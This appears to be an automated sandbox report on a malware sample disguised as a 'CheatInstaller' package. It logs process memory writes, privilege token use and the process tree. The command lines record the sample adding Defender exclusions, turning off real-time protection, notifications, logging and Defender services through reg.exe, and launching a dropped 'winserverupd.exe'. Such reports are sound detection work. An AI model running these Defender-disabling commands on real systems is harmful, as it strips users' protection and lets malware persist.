N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\wermgr.exe N/A
N/A N/A C:\Windows\SysWOW64\wermgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 360 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe
PID 360 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe
PID 360 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe
PID 2676 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2676 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2676 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 208 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 208 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 208 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2676 wrote to memory of 3156 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2676 wrote to memory of 3156 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2676 wrote to memory of 3156 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3156 wrote to memory of 4828 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3156 wrote to memory of 4828 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 1900 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4828 wrote to memory of 1900 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1900 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2676 wrote to memory of 3592 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2676 wrote to memory of 3592 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2676 wrote to memory of 3592 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1900 wrote to memory of 3336 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 3336 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 3336 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4560 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4560 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1900 wrote to memory of 4560 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 02DD1167C07FCFD6BE2DF9BEE59BA10A C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710548241 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6CF9FE7E9BE23E9CCB8C32512C91691D

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss9D7B.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi9D78.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr9D79.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr9D7A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B516BB2DD5BBC8EFE1ACA52DFCBFD653 E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSI4C3.tmp

"C:\Windows\Installer\MSI4C3.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4C6.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4B3.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4B4.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4B5.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\54A.tmp\54B.tmp\54C.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

